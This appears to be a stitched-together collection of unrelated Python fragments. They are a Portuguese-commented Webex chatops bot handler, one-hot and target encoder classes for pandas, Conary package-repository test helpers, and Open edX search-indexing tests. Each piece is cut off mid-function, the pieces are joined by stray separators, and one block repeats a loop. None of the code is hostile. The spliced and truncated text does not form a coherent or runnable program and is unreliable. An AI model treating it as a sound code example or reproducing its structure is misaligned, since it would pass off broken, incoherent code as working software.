msg="Chatops Teams 1.0\nComandos disponiveis:\nhelp: esta ajuda\nProcura <nome ou tudo>: Procurar local do Asset\nCategorias <nome ou tudo>: Lista Categorias cadastradas no OPI como nome identificado\nAsset <nome do asset>:apresenta detalhes do Asset\n"
msg=msg+str("userid <email>: Identifica ID do usuario\nroomid <nome da sala>: Identifica ID da sala\nsalas: lista salas que pertenco\n")
# chama funcao para procurar OPI somente se ouver 2 parametros
if box == "procura" and len(sp)>1:
asset=sp[1]
msg = OpiFindAssets(asset)
# chama funcao para procurar OPI somente se ouver 2 parametros
if box == "categorias" and len(sp)>1:
categoria=sp[1]
msg = OpiCategorySearch(categoria)
# chama funcao para procurar OPI somente se ouver 2 parametros
if box == "asset" and len(sp)>1:
asset=sp[1]
msg = OpiAssetDetail(asset)
# chamada funcao se houver no minimo 2 parametros
if box == "userid" and len(sp)>1:
email=sp[1]
msg = str("ID da user: " +str(email)+": "+str(getwebexUserID(email)))
# chamada funcao se houver no minimo 2 parametros
if box == "roomid" and len(sp)>1:
sala=sp[1]
msg = str("ID da sala: " +str(sala)+": "+str(getwebexRoomID(sala)))
if | |
when a column is not in dataframe
"""
# Check types
if cols is not None and not isinstance(cols, (list, str)):
raise TypeError('cols must be None, or a list or a string')
if isinstance(cols, list):
if not all(isinstance(c, str) for c in cols):
raise TypeError('each element of cols must be a string')
if not isinstance(reduce_df, bool):
raise TypeError('reduce_df must be True or False')
if not isinstance(dtype, str):
raise TypeError('dtype must be a string (e.g. \'uint8\'')
if nocol is not None and nocol not in ('warn', 'err'):
raise ValueError('nocol must be None, \'warn\', or \'err\'')
# Store parameters
if isinstance(cols, str):
self.cols = [cols]
else:
self.cols = cols
self.reduce_df = reduce_df
self.dtype = dtype
self.nocol = nocol
def fit(self, X, y):
"""Fit one-hot encoder to X and y
Parameters
----------
X : pandas DataFrame of shape (n_samples, n_columns)
Independent variable matrix with columns to encode
y : pandas Series of shape (n_samples,)
Dependent variable values.
Returns
-------
OneHotEncoder
Returns self, the fit object.
"""
# Encode all categorical cols by default
if self.cols is None:
self.cols = [c for c in X
if str(X[c].dtype)=='object']
# Check columns are in X
if self.nocol == 'err':
for col in self.cols:
if col not in X:
raise ValueError('Column \''+col+'\' not in X')
elif self.nocol == 'warn':
for col in self.cols:
if col not in X:
print('Column \''+col+'\' not in X')
# Store each unique value
self.maps = dict()
for col in self.cols:
self.maps[col] = []
uniques = X[col].unique()
for unique in uniques:
self.maps[col].append(unique)
# Remove last degree of freedom
if self.reduce_df:
for col in self.cols:
del self.maps[col][-1]
# Return fit object
return self
def transform(self, X, y=None):
"""Perform the one-hot encoding transformation.
Parameters
----------
X : pandas DataFrame of shape (n_samples, n_columns)
Independent variable matrix with columns to encode
Returns
-------
pandas DataFrame
Input DataFrame with transformed columns
"""
Xo = X.copy()
for col, vals in self.maps.items():
for val in vals:
new_col = col+'_'+str(val)
Xo[new_col] = (Xo[col]==val).astype(self.dtype)
del Xo[col]
return Xo
def fit_transform(self, X, y=None):
"""Fit and transform the data with one-hot encoding.
Parameters
----------
X : pandas DataFrame of shape (n_samples, n_columns)
Independent variable matrix with columns to encode
y : pandas Series of shape (n_samples,)
Dependent variable values.
Returns
-------
pandas DataFrame
Input DataFrame with transformed columns
"""
return self.fit(X, y).transform(X, y)
class TargetEncoder(BaseEstimator, TransformerMixin):
"""Target encoder.
Replaces category values in categorical column(s) with the mean target
(dependent variable) value for each category.
"""
def __init__(self, cols=None, dtype='float64', nocol=None):
"""Target encoder.
Parameters
----------
cols : str or list of str
Column(s) to target encode. Default is to target encode all
categorical columns in the DataFrame.
dtype : str
Datatype to use for encoded columns. Default = 'float64'
nocol : None or str
Action to take if a col in ``cols`` is not in the dataframe to
transform. Valid values:
* None - ignore cols in ``cols`` which are not in dataframe
* 'warn' - issue a warning when a column is not in dataframe
* 'err' - raise an error when a column is not in dataframe
"""
# Check types
if cols is not None and not isinstance(cols, (list, str)):
raise TypeError('cols must be None, or a list or a string')
if isinstance(cols, list):
if not all(isinstance(c, str) for c in cols):
raise TypeError('each element of cols must be a string')
if not isinstance(dtype, str):
raise TypeError('dtype must be a string (e.g. \'uint8\'')
if nocol is not None and nocol not in ('warn', 'err'):
raise ValueError('nocol must be None, \'warn\', or \'err\'')
# Store parameters
if isinstance(cols, str):
self.cols = [cols]
else:
self.cols = cols
self.dtype = dtype
self.nocol = nocol
def fit(self, X, y):
"""Fit target encoder to X and y.
Parameters
----------
X : pandas DataFrame of shape (n_samples, n_columns)
Independent variable matrix with columns to encode
y : pandas Series of shape (n_samples,)
Dependent variable values.
Returns
-------
TargetEncoder
Returns self, the fit object.
"""
# Encode all categorical cols by default
if self.cols is None:
self.cols = [col for col in X if str(X[col].dtype)=='object']
# Check columns are in X
if self.nocol == 'err':
for col in self.cols:
if col not in X:
raise ValueError('Column \''+col+'\' not in X')
elif self.nocol == 'warn':
for col in self.cols:
if col not in X:
print('Column \''+col+'\' not in X')
# Encode each element of each column
self.maps = dict()
for col in self.cols:
if col in X:
tmap = dict()
uniques = X[col].unique()
for unique in uniques:
tmap[unique] = y[X[col]==unique].mean()
self.maps[col] = tmap
# Return fit object
return self
def transform(self, X, y=None):
"""Perform the target encoding transformation.
Parameters
----------
X : pandas DataFrame of shape (n_samples, n_columns)
Independent variable matrix with columns to encode
Returns
-------
pandas DataFrame
Input DataFrame with transformed columns
"""
Xo = X.copy()
for col, tmap in self.maps.items():
vals = np.full(X.shape[0], np.nan, dtype=self.dtype)
for val, mean_target in tmap.items():
vals[X[col]==val] = mean_target
Xo[col] = vals
return Xo
def fit_transform(self, X, y=None):
"""Fit and transform the data with target encoding.
Parameters
----------
X : pandas DataFrame of shape (n_samples, n_columns)
Independent variable matrix with columns to encode
y : pandas Series of shape (n_samples,)
Dependent variable values.
Returns
-------
pandas DataFrame
Input DataFrame with transformed columns
"""
return self.fit(X, y).transform(X, y)
class TargetEncoderCV(BaseEstimator, TransformerMixin):
"""Cross-fold target encoder.
Replaces category values in categorical column(s) with the mean target
(dependent variable) value for each category, using a cross-fold strategy
such that no sample's target value is used in computing the target mean
which is used to replace that sample's category value.
"""
def __init__(self, cols=None, n_splits=3, shuffle=True, dtype='float64',
nocol=None):
"""Cross-fold target encoder.
Parameters
----------
cols : str or list of str
Column(s) to target encode. Default is to target encode all
categorical columns in the DataFrame.
n_splits : int
Number of cross-fold splits. Default = 3.
shuffle : bool
Whether to shuffle the data when splitting into folds.
dtype : str
Datatype to use for encoded columns. Default = 'float64'
nocol : None or str
Action to take if a col in ``cols`` is not in the dataframe to
transform. Valid values:
* None - ignore cols in ``cols`` which are not in dataframe
* 'warn' - issue a warning when a column is not in dataframe
* 'err' - raise an error when a column is not in dataframe
"""
# Check types
if cols is not None and not isinstance(cols, (list, str)):
raise TypeError('cols must be None, or a list or a string')
if isinstance(cols, list):
if not all(isinstance(c, str) for c in cols):
raise TypeError('each element of cols must be a string')
if not isinstance(n_splits, int):
raise TypeError('n_splits must be an integer')
if n_splits < 1:
raise ValueError('n_splits must be positive')
if not isinstance(shuffle, bool):
raise TypeError('shuffle must be True or False')
if not isinstance(dtype, str):
raise TypeError('dtype must be a string (e.g. \'float64\'')
if nocol is not None and nocol not in ('warn', 'err'):
raise ValueError('nocol must be None, \'warn\', or \'err\'')
# Store parameters
if isinstance(cols, str):
self.cols = [cols]
else:
self.cols = cols
self.n_splits = n_splits
self.shuffle = shuffle
self.dtype = dtype
self.nocol = nocol
def fit(self, X, y):
"""Fit cross-fold target encoder to X and y.
Parameters
----------
X : pandas DataFrame of shape (n_samples, n_columns)
Independent variable matrix with columns to encode
y : pandas Series of shape (n_samples,)
Dependent variable values.
Returns
-------
TargetEncoderCV
Returns self, the fit object.
"""
self._target_encoder = TargetEncoder(cols=self.cols, nocol=self.nocol)
self._target_encoder.fit(X, y)
return self
def transform(self, X, y=None):
"""Perform the target encoding transformation.
Uses cross-fold target encoding when given training data, and uses
| |
= '/contents%s' % filePrimer
contents = 'hello, world!\n'
if not filePrimer:
filePrimer = '\0'
filePrimer = str(filePrimer)
# Pad it on the left with zeros, up to 16 chars long
pathId = filePrimer.rjust(16, '\1')
pathId = pathId[0:16]
contents = RegularFile(contents = contents, pathId = pathId,
config = None)
fileContents = [(path, contents)]
index = 0
for fileInfo in fileContents:
fileReq = None
fileProv = None
fileFlavor = None
if isinstance(fileInfo, str):
fileInfo = [fileInfo, 'foo']
fileName, contents = fileInfo[0:2]
if isinstance(contents, filetypes._File):
assert(len(fileInfo) == 2)
else:
if len(fileInfo) > 3:
if isinstance(fileInfo[3], (list, tuple)):
fileReq = fileInfo[3][0]
fileProv = fileInfo[3][1]
else:
fileReq = fileInfo[3]
if len(fileInfo) > 2 and fileInfo[2] is not None:
fileVersion = self._cvtVersion(fileInfo[2])
else:
fileVersion = troveVersion
contents = RegularFile(requires = fileReq,
provides = fileProv,
contents = contents)
contents.version = fileVersion
cont = componentDir + '/' + fileName
dir = os.path.dirname(cont)
if not os.path.exists(dir):
util.mkdirChain(dir)
pathId = contents.pathId
if pathId is None:
pathId = sha1helper.md5String(pathIdSalt + fileName)
else:
pathId += '0' * (16 - len(pathId))
f = contents.get(pathId)
f.flags.isSource(isSource)
if contents.config is not None:
f.flags.isConfig(contents.config)
elif ((setConfigFlags and fileName.startswith('/etc'))
or troveName.endswith(':source')):
f.flags.isConfig(True)
index += 1
if capsule and not (f.flags.isConfig() or
getattr(contents, 'isGhost', None)):
# RBL-5684: we force ghost files to not be marked as
# payload
f.flags.isEncapsulatedContent(True)
if contents.version:
fileVersion = self._cvtVersion(contents.version)
elif (versus and versus.hasFile(pathId) and
versus.getFile(pathId)[1] == f.fileId()):
# reuse file version if it hasn't changed
fileVersion = versus.getFile(pathId)[2]
else:
fileVersion = troveVersion
if not troveName.endswith(':source'):
if fileName[0] != '/':
fileName = '/' + fileName
assert(len(pathId) == 16)
t.addFile(pathId, fileName, fileVersion, f.fileId())
if hasattr(contents, 'contents'):
fileList.append((f, pathId, contents.contents))
else:
fileList.append((f, pathId, None))
# find the flavor for this trove; it depends on the flavors of the
# files
for f, pathId, contents in fileList:
flavor.union(f.flavor())
t.changeFlavor(flavor)
# create an absolute changeset
cs = changeset.ChangeSet()
if existsOkay and repos.hasTrove(troveName, troveVersion, flavor):
return repos.getTrove(troveName, troveVersion, flavor), None
if factory is not None:
t.setFactory(factory)
if not redirect:
if isinstance(requires, str):
req = deps.parseDep(requires)
else:
req = requires.copy()
if isinstance(provides, str):
prov = deps.parseDep(provides)
else:
prov = provides.copy()
prov.union(deps.parseDep('trove: %s' % t.getName()))
for f, pathId, contents in fileList:
req.union(f.requires())
prov.union(f.provides())
t.setRequires(req)
t.setProvides(prov)
if not troveName.endswith(':source'):
if not sourceName:
sourceName = troveName.split(":")[0] + ":source"
t.setSourceName(sourceName)
t.computePathHashes()
t.setBuildTime(buildTime)
if redirect:
for toName, toBranch, toFlavor in redirectList:
t.addRedirect(toName, toBranch, toFlavor)
if redirect:
for toName, toBranch, toFlavor in redirectList:
t.addRedirect(toName, toBranch, toFlavor)
size = 0
# add the file and file contents
for f, pathId, contents in fileList:
cs.addFile(None, f.fileId(), f.freeze())
if f.hasContents and not f.flags.isEncapsulatedContent():
cs.addFileContents(pathId, f.fileId(),
changeset.ChangedFileTypes.file, contents,
f.flags.isConfig())
size += f.contents.size()
if metadata:
if not isinstance(metadata, (tuple, list)):
metadata = [metadata]
for item in metadata:
t.troveInfo.metadata.addItem(item)
t.setSize(size)
t.computeDigests()
diff = t.diff(None, absolute = True)[0]
cs.newTrove(diff)
cs.setPrimaryTroveList([t.getNameVersionFlavor()])
return t, cs
addQuickTestComponent = addComponent
def addDbComponent(self, db, name, version='1', flavor='',
provides=deps.DependencySet(),
requires=deps.DependencySet()):
fileList = []
# create a file
cont = self.workDir + '/contents'
f = open(cont, 'w')
f.write('hello, world!\n')
f.close()
pathId = sha1helper.md5FromString('0' * 32)
f = files.FileFromFilesystem(cont, pathId)
fileList.append((f, cont, pathId))
v = self._cvtVersion(version)
flavor = deps.parseFlavor(flavor)
t = trove.Trove(name, v, flavor, None)
for f, name, pathId in fileList:
t.addFile(pathId, '/' + name, v, f.fileId())
t.setRequires(requires)
t.setProvides(provides)
info = db.addTrove(t)
db.addTroveDone(info)
db.commit()
return t
addQuickDbTestPkg = addDbComponent
def addRPMComponent(self, nameSpec, rpmPath, versus = None,
fileContents=None, requires=deps.DependencySet()):
if rpmPath[0] != '/':
rpmPath = resources.get_archive(rpmPath)
f = open(rpmPath, "r")
h = rpmhelper.readHeader(f)
expandDir = self.workDir + '/rpm'
if os.path.exists(expandDir):
shutil.rmtree(expandDir)
os.mkdir(expandDir)
p = os.popen("cd %s; cpio --quiet -iumd" % (expandDir, ), "w")
rpmhelper.extractRpmPayload(f, p)
p.close()
f.close()
fl = []
for path, mode, flags, linksTo, fileColor, rdev in itertools.izip(
h[rpmhelper.OLDFILENAMES],
h[rpmhelper.FILEMODES], h[rpmhelper.FILEFLAGS],
h[rpmhelper.FILELINKTOS],
h[rpmhelper.FILECOLORS],
h[rpmhelper.FILERDEVS]):
if stat.S_ISDIR(mode):
fl.append((path, Directory()))
elif stat.S_ISBLK(mode) or stat.S_ISCHR(mode):
minor = rdev & 0xff | (rdev >> 12) & 0xffffff00
major = (rdev >> 8) & 0xfff
if stat.S_ISBLK(mode):
fl.append((path, BlockDevice(major, minor)))
elif stat.S_ISCHR(mode):
fl.append((path, CharacterDevice(major, minor)))
else:
isConfig = ((flags & rpmhelper.RPMFILE_CONFIG) != 0)
isGhost = ((flags & rpmhelper.RPMFILE_GHOST) != 0)
# You can't have symlinks that are initialContents
if stat.S_ISLNK(mode):
fobj = Symlink(linksTo)
else:
if isGhost:
contents = ''
# can't have files which are both initialContents
# and config
isConfig = False
else:
contents = open(expandDir + path)
if fileColor == 2:
req = 'abi: ELF64(SysV x86_64)'
elif fileColor == 1:
req = 'abi: ELF32(SysV x86)'
else:
req = None
fobj = RegularFile(contents = contents,
config = isConfig,
initialContents = isGhost,
requires = req)
if isGhost:
# RBL-5684: we force ghost files to not be marked as
# payload (see Component)
fobj.isGhost = True
fl.append((path, fobj))
fl.extend(fileContents or [])
return self.addComponent(nameSpec, fileContents = fl,
capsule = rpmPath, versus = versus,
requires=requires)
def addTestPkg(self, num, requires=[], fail=False, content='',
flags=[], localflags=[], packageSpecs=[], subPackages=[],
version='1.0', branch=None,
header='', fileContents='',
tag=None, binary=False):
""" This method is a wrapper around the recipes.py createRecipe
method. It creates the recipe with the given characteristics,
and then commits it to the repository.
num = recipe name is 'test%(num)s
requires = other packages added to the buildRequires of
this package
fail - if true, an exit(1) is added
fileContents - contents of the text file in the package
content - place to add content to the recipe setup() function
header - place to add content to the recipe before setup()
branch - place this source component on a branch
localFlags - check Flags.foo for this recipe for every foo passed in
flags - check use.[Arch,Use].foo, for every [Arch,Use].foo passed in
"""
origDir = os.getcwd()
os.chdir(self.workDir)
pkgname = 'test%d' % num
if not 'packages' in self.__dict__:
self.packages = {}
if num in self.packages:
self.checkout(pkgname, branch)
else:
self.newpkg(pkgname)
os.chdir(pkgname)
if not isinstance(subPackages, (tuple, list)):
subPackages = [subPackages]
if not isinstance(packageSpecs, (tuple, list)):
packageSpecs = [packageSpecs]
fileContents = recipes.createRecipe(num, requires, fail, content,
packageSpecs, subPackages, version=version, flags=flags,
localflags=localflags, header=header, fileContents=fileContents,
tag=tag, binary=binary)
self.writeFile(pkgname + '.recipe', fileContents)
if num not in self.packages:
self.addfile(pkgname + '.recipe')
self.commit()
os.chdir('..')
shutil.rmtree(pkgname)
os.chdir(origDir)
self.packages[num] = pkgname
return fileContents
def cookTestPkg(self, num, logLevel=log.WARNING, macros={}, prep=False):
stdout = os.dup(sys.stdout.fileno())
stderr = os.dup(sys.stderr.fileno())
null = os.open('/dev/null', os.O_WRONLY)
os.dup2(null, sys.stdout.fileno())
os.dup2(null, sys.stderr.fileno())
try:
return cook.cookItem(self.repos, self.cfg, 'test%s' % num, macros=macros, prep=prep)
finally:
os.dup2(stdout, sys.stdout.fileno())
os.dup2(stderr, sys.stderr.fileno())
os.close(null)
os.close(stdout)
os.close(stderr)
def createMetadataItem(self, **kw):
mi = trove.MetadataItem()
for key, value in kw.items():
if isinstance(value, (list, tuple)):
for val in value:
getattr(mi, key).set(val)
elif isinstance(value, dict):
getattr(mi, key).update(value)
else:
getattr(mi, key).set(value)
return mi
def cookFromRepository(self, troveName, buildLabel = None, ignoreDeps = False, repos = None, logBuild = False, callback = None):
if buildLabel:
oldLabel = self.cfg.buildLabel
self.cfg.buildLabel = buildLabel
if not repos:
repos = self.openRepository()
built = self.discardOutput( cook.cookItem, repos, self.cfg, troveName,
ignoreDeps = ignoreDeps, logBuild = logBuild,
callback = callback )
if buildLabel:
self.cfg.buildLabel = oldLabel
return built[0]
def verifyFifo(self, file):
return stat.S_ISFIFO(os.lstat(file).st_mode)
def verifyFile(self, path, contents=None, perms=None):
f = open(path, "r")
other = f.read()
if contents is not None:
if other != contents:
self.fail("contents incorrect for %s" % path)
assert(other == contents)
if perms is not None:
assert(os.stat(path)[stat.ST_MODE] & 0777 == perms)
def verifyNoFile(self, file):
try:
f = open(file, "r")
except IOError, err:
if err.errno == 2:
return
else:
self.fail("verifyNoFile returned unexpected error code: %d" % err.errno)
else:
self.fail("file exists: %s" % file)
def verifySrcDirectory(self, contents, dir = "."):
self.verifyDirectory(contents + [ "CONARY" ], dir)
def verifyDirectory(self, contents, dir = "."):
self.verifyFileList(contents, os.listdir(dir))
def verifyPackageFileList(self, pkg, ideal):
list = [ x[1] for x in pkg.iterFileList() ]
self.verifyFileList(ideal, list)
def verifyTroves(self, pkg, ideal):
actual = [ (x[0], x[1].asString(), x[2]) \
for x in pkg.iterTroveList(strongRefs=True) ]
if sorted(actual) != sorted(ideal):
self.fail("troves don't match expected: got %s expected %s"
%(actual, ideal))
def verifyFileList(self, ideal, actual):
dict = {}
for n in ideal: dict[n] = 1
for n in actual:
if dict.has_key(n):
del dict[n]
else:
self.fail("unexpected file %s" % n)
if dict:
self.fail("files missing %s" % " ".join(dict.keys()))
assert(not dict)
def verifyInstalledFileList(self, dir, list):
paths = {}
for path in list:
paths[path] = | |
SearchIndexingError """
self.publish_item(store, self.vertical.location)
with self.assertRaises(SearchIndexingError):
self.reindex_course(store)
@ddt.data(*WORKS_WITH_STORES)
def test_indexing_course(self, store_type):
self._perform_test_using_store(store_type, self._test_indexing_course)
@ddt.data(*WORKS_WITH_STORES)
def test_not_indexing_unpublished_content(self, store_type):
self._perform_test_using_store(store_type, self._test_not_indexing_unpublished_content)
@ddt.data(*WORKS_WITH_STORES)
def test_deleting_item(self, store_type):
self._perform_test_using_store(store_type, self._test_deleting_item)
@ddt.data(*WORKS_WITH_STORES)
def test_start_date_propagation(self, store_type):
self._perform_test_using_store(store_type, self._test_start_date_propagation)
@ddt.data(*WORKS_WITH_STORES)
def test_search_disabled(self, store_type):
self._perform_test_using_store(store_type, self._test_search_disabled)
@ddt.data(*WORKS_WITH_STORES)
def test_time_based_index(self, store_type):
self._perform_test_using_store(store_type, self._test_time_based_index)
@ddt.data(*WORKS_WITH_STORES)
def test_exception(self, store_type):
self._perform_test_using_store(store_type, self._test_exception)
@ddt.data(*WORKS_WITH_STORES)
def test_course_about_property_index(self, store_type):
self._perform_test_using_store(store_type, self._test_course_about_property_index)
@ddt.data(*WORKS_WITH_STORES)
def test_course_about_store_index(self, store_type):
self._perform_test_using_store(store_type, self._test_course_about_store_index)
@ddt.data(*WORKS_WITH_STORES)
def test_course_about_mode_index(self, store_type):
self._perform_test_using_store(store_type, self._test_course_about_mode_index)
@ddt.data(*WORKS_WITH_STORES)
def test_course_location_info(self, store_type):
self._perform_test_using_store(store_type, self._test_course_location_info)
@ddt.data(*WORKS_WITH_STORES)
def test_course_location_null(self, store_type):
self._perform_test_using_store(store_type, self._test_course_location_null)
@ddt.data(*WORKS_WITH_STORES)
def test_delete_course_from_search_index_after_course_deletion(self, store_type):
""" Test for removing course from CourseAboutSearchIndexer """
self._perform_test_using_store(store_type, self._test_delete_course_from_search_index_after_course_deletion)
@patch('django.conf.settings.SEARCH_ENGINE', 'search.tests.utils.ForceRefreshElasticSearchEngine')
@ddt.ddt
class TestLargeCourseDeletions(MixedWithOptionsTestCase):
""" Tests to excerise deleting items from a course """
WORKS_WITH_STORES = (ModuleStoreEnum.Type.mongo, ModuleStoreEnum.Type.split)
def _clean_course_id(self):
"""
Clean all documents from the index that have a specific course provided.
"""
if self.course_id:
response = self.searcher.search(field_dictionary={"course": self.course_id})
while response["total"] > 0:
for item in response["results"]:
self.searcher.remove(item["data"]["id"])
response = self.searcher.search(field_dictionary={"course": self.course_id})
self.course_id = None
def setUp(self):
super().setUp()
self.course_id = None
def tearDown(self):
super().tearDown()
self._clean_course_id()
def assert_search_count(self, expected_count):
""" Check that the search within this course will yield the expected number of results """
response = self.searcher.search(field_dictionary={"course": self.course_id})
self.assertEqual(response["total"], expected_count)
def _do_test_large_course_deletion(self, store, load_factor):
""" Test that deleting items from a course works even when present within a very large course """
def id_list(top_parent_object):
""" private function to get ids from object down the tree """
list_of_ids = [str(top_parent_object.location)]
for child in top_parent_object.get_children():
list_of_ids.extend(id_list(child))
return list_of_ids
course, course_size = create_large_course(store, load_factor)
self.course_id = str(course.id)
# index full course
CoursewareSearchIndexer.do_course_reindex(store, course.id)
self.assert_search_count(course_size)
# reload course to allow us to delete one single unit
course = store.get_course(course.id, depth=1)
# delete the first chapter
chapter_to_delete = course.get_children()[0]
self.delete_item(store, chapter_to_delete.location)
# index and check correctness
CoursewareSearchIndexer.do_course_reindex(store, course.id)
deleted_count = 1 + load_factor + (load_factor ** 2) + (load_factor ** 3)
self.assert_search_count(course_size - deleted_count)
def _test_large_course_deletion(self, store):
""" exception catch-ing wrapper around large test course test with deletions """
# load_factor of 6 (1296 items) takes about 5 minutes to run on devstack on a laptop
# load_factor of 7 (2401 items) takes about 70 minutes to run on devstack on a laptop
# load_factor of 8 (4096 items) takes just under 3 hours to run on devstack on a laptop
load_factor = 6
try:
self._do_test_large_course_deletion(store, load_factor)
except: # pylint: disable=bare-except
# Catch any exception here to see when we fail
print(f"Failed with load_factor of {load_factor}")
@skip("This test is to see how we handle very large courses, to ensure that the delete"
"procedure works smoothly - too long to run during the normal course of things")
@ddt.data(*WORKS_WITH_STORES)
def test_large_course_deletion(self, store_type):
self._perform_test_using_store(store_type, self._test_large_course_deletion)
class TestTaskExecution(SharedModuleStoreTestCase):
"""
Set of tests to ensure that the task code will do the right thing when
executed directly. The test course and library gets created without the listeners
being present, which allows us to ensure that when the listener is
executed, it is done as expected.
"""
@classmethod
def setUpClass(cls):
super().setUpClass()
SignalHandler.course_published.disconnect(listen_for_course_publish)
SignalHandler.library_updated.disconnect(listen_for_library_update)
cls.course = CourseFactory.create(start=datetime(2015, 3, 1, tzinfo=UTC))
cls.chapter = ItemFactory.create(
parent_location=cls.course.location,
category='chapter',
display_name="Week 1",
publish_item=True,
start=datetime(2015, 3, 1, tzinfo=UTC),
)
cls.sequential = ItemFactory.create(
parent_location=cls.chapter.location,
category='sequential',
display_name="Lesson 1",
publish_item=True,
start=datetime(2015, 3, 1, tzinfo=UTC),
)
cls.vertical = ItemFactory.create(
parent_location=cls.sequential.location,
category='vertical',
display_name='Subsection 1',
publish_item=True,
start=datetime(2015, 4, 1, tzinfo=UTC),
)
# unspecified start - should inherit from container
cls.html_unit = ItemFactory.create(
parent_location=cls.vertical.location,
category="html",
display_name="Html Content",
publish_item=False,
)
cls.library = LibraryFactory.create()
cls.library_block1 = ItemFactory.create(
parent_location=cls.library.location,
category="html",
display_name="Html Content",
publish_item=False,
)
cls.library_block2 = ItemFactory.create(
parent_location=cls.library.location,
category="html",
display_name="Html Content 2",
publish_item=False,
)
@classmethod
def tearDownClass(cls):
SignalHandler.course_published.connect(listen_for_course_publish)
SignalHandler.library_updated.connect(listen_for_library_update)
super().tearDownClass()
def test_task_indexing_course(self):
"""
Making sure that the receiver correctly fires off the task when invoked
by signal.
"""
searcher = SearchEngine.get_search_engine(CoursewareSearchIndexer.INDEX_NAME)
response = searcher.search(
field_dictionary={"course": str(self.course.id)}
)
self.assertEqual(response["total"], 0)
listen_for_course_publish(self, self.course.id)
# Note that this test will only succeed if celery is working in inline mode
response = searcher.search(
field_dictionary={"course": str(self.course.id)}
)
self.assertEqual(response["total"], 3)
def test_task_library_update(self):
""" Making sure that the receiver correctly fires off the task when invoked by signal """
searcher = SearchEngine.get_search_engine(LibrarySearchIndexer.INDEX_NAME)
library_search_key = str(normalize_key_for_search(self.library.location.library_key))
response = searcher.search(field_dictionary={"library": library_search_key})
self.assertEqual(response["total"], 0)
listen_for_library_update(self, self.library.location.library_key)
# Note that this test will only succeed if celery is working in inline mode
response = searcher.search(field_dictionary={"library": library_search_key})
self.assertEqual(response["total"], 2)
def test_ignore_ccx(self):
"""Test that we ignore CCX courses (it's too slow now)."""
# We're relying on our CCX short circuit to just stop execution as soon
# as it encounters a CCX key. If that isn't working properly, it will
# fall through to the normal indexing and raise an exception because
# there is no data or backing course behind the course key.
with patch('cms.djangoapps.contentstore.courseware_index.CoursewareSearchIndexer.index') as mock_index:
self.assertIsNone(
update_search_index(
"ccx-v1:OpenEdX+FAKECOURSE+FAKERUN+ccx@1", "2020-09-28T16:41:57.150796"
)
)
self.assertFalse(mock_index.called)
@pytest.mark.django_db
@ddt.ddt
class TestLibrarySearchIndexer(MixedWithOptionsTestCase):
""" Tests the operation of the CoursewareSearchIndexer """
# libraries work only with split, so do library indexer
WORKS_WITH_STORES = (ModuleStoreEnum.Type.split, )
def setUp(self):
super().setUp()
self.library = None
self.html_unit1 = None
self.html_unit2 = None
def setup_course_base(self, store):
"""
Set up the for the course outline tests.
"""
self.library = LibraryFactory.create(modulestore=store)
self.html_unit1 = ItemFactory.create(
parent_location=self.library.location,
category="html",
display_name="Html Content",
modulestore=store,
publish_item=False,
)
self.html_unit2 = ItemFactory.create(
parent_location=self.library.location,
category="html",
display_name="Html Content 2",
modulestore=store,
publish_item=False,
)
INDEX_NAME = LibrarySearchIndexer.INDEX_NAME
def _get_default_search(self):
""" Returns field_dictionary for default search """
return {"library": str(self.library.location.library_key.replace(version_guid=None, branch=None))}
def reindex_library(self, store):
""" kick off complete reindex of the course """
return LibrarySearchIndexer.do_library_reindex(store, self.library.location.library_key)
def _get_contents(self, response):
""" Extracts contents from search response """
return [item['data']['content'] for item in response['results']]
def _test_indexing_library(self, store):
""" indexing course tests """
self.reindex_library(store)
response = self.search()
self.assertEqual(response["total"], 2)
added_to_index = self.reindex_library(store)
self.assertEqual(added_to_index, 2)
response = self.search()
self.assertEqual(response["total"], 2)
def _test_creating_item(self, store):
""" test updating an item """
self.reindex_library(store)
response = self.search()
self.assertEqual(response["total"], 2)
# updating a library item causes immediate reindexing
data = "Some data"
ItemFactory.create(
parent_location=self.library.location,
category="html",
display_name="Html Content 3",
data=data,
modulestore=store,
publish_item=False,
)
self.reindex_library(store)
response = self.search()
self.assertEqual(response["total"], 3)
html_contents = [cont['html_content'] for cont in self._get_contents(response)]
self.assertIn(data, html_contents)
def _test_updating_item(self, store):
""" test updating an item """
self.reindex_library(store)
response = self.search()
self.assertEqual(response["total"], 2)
# updating a library item causes immediate reindexing
new_data = "I'm new data"
self.html_unit1.data = new_data
self.update_item(store, self.html_unit1)
self.reindex_library(store)
response = self.search()
self.assertEqual(response["total"], 2)
html_contents = [cont['html_content'] for cont in self._get_contents(response)]
self.assertIn(new_data, html_contents)
def _test_deleting_item(self, store):
""" test deleting an item """
self.reindex_library(store)
response = self.search()
self.assertEqual(response["total"], 2)
# deleting a library item causes immediate reindexing
self.delete_item(store, self.html_unit1.location)
self.reindex_library(store)
response = self.search()
self.assertEqual(response["total"], 1)
@patch('django.conf.settings.SEARCH_ENGINE', None)
def _test_search_disabled(self, store):
""" if search setting has it as off, confirm that nothing is indexed """
indexed_count = self.reindex_library(store)
self.assertFalse(indexed_count)
@patch('django.conf.settings.SEARCH_ENGINE', 'search.tests.utils.ErroringIndexEngine')
def _test_exception(self, store):
""" Test that exception within indexing yields a SearchIndexingError """
with self.assertRaises(SearchIndexingError):
self.reindex_library(store)
@ddt.data(*WORKS_WITH_STORES)
def test_indexing_library(self, store_type):
self._perform_test_using_store(store_type, self._test_indexing_library)
@ddt.data(*WORKS_WITH_STORES)
def test_updating_item(self, store_type):
self._perform_test_using_store(store_type, self._test_updating_item)
@ddt.data(*WORKS_WITH_STORES)
def test_creating_item(self, store_type):
self._perform_test_using_store(store_type, self._test_creating_item)
@ddt.data(*WORKS_WITH_STORES)
def test_deleting_item(self, store_type):
self._perform_test_using_store(store_type, self._test_deleting_item)
@ddt.data(*WORKS_WITH_STORES)
def test_search_disabled(self, store_type):
self._perform_test_using_store(store_type, self._test_search_disabled)
@ddt.data(*WORKS_WITH_STORES)
def test_exception(self, store_type):
self._perform_test_using_store(store_type, self._test_exception)
class GroupConfigurationSearchMongo(CourseTestCase, MixedWithOptionsTestCase):
"""
Tests indexing of content groups on course modules using mongo modulestore.
"""
CREATE_USER = True
MODULESTORE = TEST_DATA_MONGO_MODULESTORE
INDEX_NAME = CoursewareSearchIndexer.INDEX_NAME
def setUp(self):
super().setUp()
self._setup_course_with_content()
self._setup_split_test_module()
self._setup_content_groups()
self.reload_course()
def _setup_course_with_content(self):
"""
Set up course with html content in it.
"""
self.chapter = ItemFactory.create(
parent_location=self.course.location,
category='chapter',
display_name="Week 1",
modulestore=self.store,
publish_item=True,
start=datetime(2015, 3, 1, tzinfo=UTC),
)
self.sequential = ItemFactory.create(
parent_location=self.chapter.location,
category='sequential',
display_name="Lesson 1",
